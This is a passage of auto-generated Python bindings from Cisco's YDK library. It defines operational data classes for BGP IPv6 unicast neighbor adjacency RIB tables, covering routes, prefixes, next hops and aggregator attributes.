self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors, [], name, value)
class OpenConfigNeighbor(_Entity_):
"""
Neighbor name
.. attribute:: neighbor_address (key)
Neighbor Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: adj_rib_in_post
Adjacency rib in\-bound post\-policy table
**type**\: :py:class:`AdjRibInPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost>`
**config**\: False
.. attribute:: adj_rib_out_post
Adjacency rib out\-bound post\-policy table
**type**\: :py:class:`AdjRibOutPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost>`
**config**\: False
.. attribute:: adj_rib_out_pre
Adjacency rib out\-bound pre\-policy table
**type**\: :py:class:`AdjRibOutPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre>`
**config**\: False
.. attribute:: adj_rib_in_pre
Adjacency rib in\-bound pre\-policy table
**type**\: :py:class:`AdjRibInPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor, self).__init__()
self.yang_name = "open-config-neighbor"
self.yang_parent_name = "open-config-neighbors"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['neighbor_address']
self._child_classes = OrderedDict([("adj-rib-in-post", ("adj_rib_in_post", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost)), ("adj-rib-out-post", ("adj_rib_out_post", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost)), ("adj-rib-out-pre", ("adj_rib_out_pre", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre)), ("adj-rib-in-pre", ("adj_rib_in_pre", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre))])
self._leafs = OrderedDict([
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
])
self.neighbor_address = None
self.adj_rib_in_post = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost()
self.adj_rib_in_post.parent = self
self._children_name_map["adj_rib_in_post"] = "adj-rib-in-post"
self.adj_rib_out_post = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost()
self.adj_rib_out_post.parent = self
self._children_name_map["adj_rib_out_post"] = "adj-rib-out-post"
self.adj_rib_out_pre = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre()
self.adj_rib_out_pre.parent = self
self._children_name_map["adj_rib_out_pre"] = "adj-rib-out-pre"
self.adj_rib_in_pre = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre()
self.adj_rib_in_pre.parent = self
self._children_name_map["adj_rib_in_pre"] = "adj-rib-in-pre"
self._segment_path = lambda: "open-config-neighbor" + "[neighbor-address='" + str(self.neighbor_address) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/open-config-neighbors/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor, ['neighbor_address'], name, value)
class AdjRibInPost(_Entity_):
"""
Adjacency rib in\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, self).__init__()
self.yang_name = "adj-rib-in-post"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-in-post"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-in-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
